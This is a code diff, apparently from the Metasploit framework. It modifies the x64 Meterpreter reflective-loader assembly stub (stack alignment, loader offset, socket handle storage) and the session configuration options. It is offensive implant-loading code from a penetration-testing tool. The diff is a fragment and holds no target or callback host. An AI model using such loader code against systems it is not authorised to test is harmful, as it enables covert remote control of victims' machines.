@@ -42,19 +42,20 @@ def asm_invoke_metsrv(opts={})
4242 push rbp ; save rbp
4343 mov rbp, rsp ; set up a new stack frame
4444 sub rsp, 32 ; allocate some space for calls.
45+ and rsp, ~0xF ; Ensure RSP is 16 byte aligned
4546 ; GetPC
4647 call $+5 ; relative call to get location
4748 pop rbx ; pop return value
4849 ; Invoke ReflectiveLoader()
4950 ; add the offset to ReflectiveLoader()
50- add rbx, #{ "0x%.8x" % ( opts [ :rdi_offset ] - 0x11 ) }
51+ add rbx, #{ "0x%.8x" % ( opts [ :rdi_offset ] - 0x15 ) }
5152 call rbx ; invoke ReflectiveLoader()
5253 ; Invoke DllMain(hInstance, DLL_METASPLOIT_ATTACH, config_ptr)
5354 ; offset from ReflectiveLoader() to the end of the DLL
5455 add rbx, #{ "0x%.8x" % ( opts [ :length ] - opts [ :rdi_offset ] ) }
5556 ^
5657
57- unless opts [ :stageless ]
58+ unless opts [ :stageless ] || opts [ :force_write_handle ] == true
5859 asm << %Q^
5960 ; store the comms socket or handle
6061 mov [rbx], rdi
@@ -79,13 +80,14 @@ def generate_config(opts={})
7980
8081 # create the configuration block, which for staged connections is really simple.
8182 config_opts = {
82- arch : opts [ :uuid ] . arch ,
83- exitfunk : ds [ 'EXITFUNC' ] ,
84- expiration : ds [ 'SessionExpirationTimeout' ] . to_i ,
85- uuid : opts [ :uuid ] ,
86- transports : opts [ :transport_config ] || [ transport_config ( opts ) ] ,
87- extensions : [ ] ,
88- stageless : opts [ :stageless ] == true
83+ arch : opts [ :uuid ] . arch ,
84+ null_session_guid : opts [ :null_session_guid ] == true ,
85+ exitfunk : ds [ :exit_func ] || ds [ 'EXITFUNC' ] ,
86+ expiration : ( ds [ :expiration ] || ds [ 'SessionExpirationTimeout' ] ) . to_i ,
87+ uuid : opts [ :uuid ] ,
88+ transports : opts [ :transport_config ] || [ transport_config ( opts ) ] ,
89+ extensions : [ ] ,
90+ stageless : opts [ :stageless ] == true
8991 }
9092
9193 # create the configuration instance based off the parameters
0 commit comments